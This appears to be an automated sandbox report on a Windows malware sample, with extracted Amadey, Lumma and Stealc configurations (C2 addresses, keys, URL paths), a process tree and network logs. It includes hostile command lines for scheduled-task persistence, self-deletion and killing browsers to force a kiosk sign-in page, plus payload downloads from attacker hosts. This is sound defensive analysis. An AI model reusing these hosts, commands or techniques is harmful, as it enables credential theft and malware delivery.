Analysis

  • max time kernel
    141s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    13-12-2024 00:06

General

  • Target

    9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe

  • Size

    3.1MB

  • MD5

    ca0f8493d787c9f2d97d00c245143f41

  • SHA1

    6ebb479b6c871e48ab97d2784b9e61fd2da1b55b

  • SHA256

    9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229

  • SHA512

    74999928fc8a11b4963180e2647d93dad68d5f25388a1dde4e9aed94bf3e3cbca9710275ebfc0c468c9071c0f4f0302f73bfcf5c65d1b1334520ac68fed21fc3

  • SSDEEP

    98304:XRN/TBqe65AG4sj49ezlNOYO+sR93Q1u7kW:X3B0oz+sRRQ1D

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

  • rc4.plain

    006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://drive-connect.cyou/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://drive-connect.cyou/api

https://covery-mover.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • XMRig Miner payload 10 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 22 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 43 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe
    "C:\Users\Admin\AppData\Local\Temp\9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2872
      • C:\Users\Admin\AppData\Local\Temp\1014564001\9JTVo50.exe
        "C:\Users\Admin\AppData\Local\Temp\1014564001\9JTVo50.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2060
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 44
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2796
      • C:\Users\Admin\AppData\Local\Temp\1014569001\ccb835542e.exe
        "C:\Users\Admin\AppData\Local\Temp\1014569001\ccb835542e.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1484
        • C:\Windows\system32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1936
          • C:\Windows\system32\mode.com
            mode 65,10
            5⤵
            PID:3064
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e file.zip -p24291711423417250691697322505 -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2188
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_7.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2068
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_6.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1984
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_5.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1920
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_4.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:840
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_3.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2528
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_2.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1804
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_1.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:3068
          • C:\Windows\system32\attrib.exe
            attrib +H "in.exe"
            5⤵
            • Views/modifies file attributes
            PID:1796
          • C:\Users\Admin\AppData\Local\Temp\main\in.exe
            "in.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1656
            • C:\Windows\system32\attrib.exe
              attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
              6⤵
              • Views/modifies file attributes
              PID:2960
            • C:\Windows\system32\attrib.exe
              attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
              6⤵
              • Views/modifies file attributes
              PID:2264
            • C:\Windows\system32\schtasks.exe
              schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:1784
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell ping 127.0.0.1; del in.exe
              6⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1816
              • C:\Windows\system32\PING.EXE
                "C:\Windows\system32\PING.EXE" 127.0.0.1
                7⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:2384
      • C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe
        "C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:1868
        • C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe
          "C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          PID:688
      • C:\Users\Admin\AppData\Local\Temp\1014571001\4b025ca5ea.exe
        "C:\Users\Admin\AppData\Local\Temp\1014571001\4b025ca5ea.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        PID:2792
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014571001\4b025ca5ea.exe" & rd /s /q "C:\ProgramData\BIMO8YMO89RQ" & exit
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2252
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 10
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:2820
      • C:\Users\Admin\AppData\Local\Temp\1014572001\2ccaab4f2b.exe
        "C:\Users\Admin\AppData\Local\Temp\1014572001\2ccaab4f2b.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1380
      • C:\Users\Admin\AppData\Local\Temp\1014573001\fb7039a8b8.exe
        "C:\Users\Admin\AppData\Local\Temp\1014573001\fb7039a8b8.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2348
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2644
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1680
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2776
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2980
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1264
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
          PID:1368
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            5⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1860
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.0.1983739428\1088985320" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1092 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d832464-d7db-432a-8f81-ac16bfbda947} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 1316 106d3458 gpu
              6⤵
              PID:2952
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.1.1829025502\1735701162" -parentBuildID 20221007134813 -prefsHandle 1536 -prefMapHandle 1532 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ade151c6-d829-4e47-b4d9-ecd242ea824a} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 1548 f3ec158 socket
              6⤵
              PID:664
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.2.557416954\589131999" -childID 1 -isForBrowser -prefsHandle 2040 -prefMapHandle 2036 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee70d7e9-dbd6-4efe-aea6-00acd2a11cda} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 2056 1065e758 tab
              6⤵
              PID:1524
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.3.1135025671\1179398381" -childID 2 -isForBrowser -prefsHandle 2768 -prefMapHandle 2764 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53ece92e-d407-4e28-9f15-f56a60771bf2} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 2780 e64258 tab
              6⤵
              PID:2644
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.4.1840816558\1387757752" -childID 3 -isForBrowser -prefsHandle 3768 -prefMapHandle 3764 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {66428f64-dd1a-4c27-b89a-21932258a8d0} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 3780 174acd58 tab
              6⤵
              PID:1784
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.5.1481086733\2094245306" -childID 4 -isForBrowser -prefsHandle 3892 -prefMapHandle 3896 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {077571cb-4d47-4627-a064-9bb94643dfd3} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 3880 1f50aa58 tab
              6⤵
              PID:1376
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.6.1072565005\38282309" -childID 5 -isForBrowser -prefsHandle 4048 -prefMapHandle 4052 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5756a53-30c8-4c61-8575-5813d1314b06} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 4036 1f509858 tab
              6⤵
              PID:2896
      • C:\Users\Admin\AppData\Local\Temp\1014574001\1206054524.exe
        "C:\Users\Admin\AppData\Local\Temp\1014574001\1206054524.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2440
      • C:\Users\Admin\AppData\Local\Temp\1014575001\7b581c1e44.exe
        "C:\Users\Admin\AppData\Local\Temp\1014575001\7b581c1e44.exe"
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Windows security modification
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2888
      • C:\Users\Admin\AppData\Local\Temp\1014576001\777b33ea97.exe
        "C:\Users\Admin\AppData\Local\Temp\1014576001\777b33ea97.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3372
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {36DD6E4C-3FE4-4BF8-9B1A-EB67400EE262} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
    1⤵
    • Loads dropped DLL
    PID:3248
    • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
      C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      PID:1584
      • C:\Windows\explorer.exe
        explorer.exe
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3284
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
        3⤵
        • Drops file in System32 directory
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3320
        • C:\Windows\system32\PING.EXE
          "C:\Windows\system32\PING.EXE" 127.1.10.1
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3048
    • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
      C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      PID:3972
      • C:\Windows\explorer.exe
        explorer.exe
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3996
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
        3⤵
        • Drops file in System32 directory
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4056
        • C:\Windows\system32\PING.EXE
          "C:\Windows\system32\PING.EXE" 127.1.10.1
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3764

                    Network

                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 4
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 156
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • [RU]
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • [RU]
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • [RU]
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • [RU]
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • [RU]
                      GET
                      http://31.41.244.11/files/6904700471/9JTVo50.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/6904700471/9JTVo50.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:03 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 2660864
                      Last-Modified: Thu, 12 Dec 2024 23:33:41 GMT
                      Connection: keep-alive
                      ETag: "675b72d5-289a00"
                      Accept-Ranges: bytes
                    • [RU]
                      GET
                      http://31.41.244.11/files/burpin1/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/burpin1/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:07 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 4438776
                      Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                      Connection: keep-alive
                      ETag: "675784f0-43baf8"
                      Accept-Ranges: bytes
                    • [RU]
                      GET
                      http://31.41.244.11/files/fate/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/fate/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:13 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 727552
                      Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT
                      Connection: keep-alive
                      ETag: "67594bc0-b1a00"
                      Accept-Ranges: bytes
                    • [RU]
                      GET
                      http://31.41.244.11/files/encoxx/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/encoxx/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:16 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 393728
                      Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT
                      Connection: keep-alive
                      ETag: "675a96d4-60200"
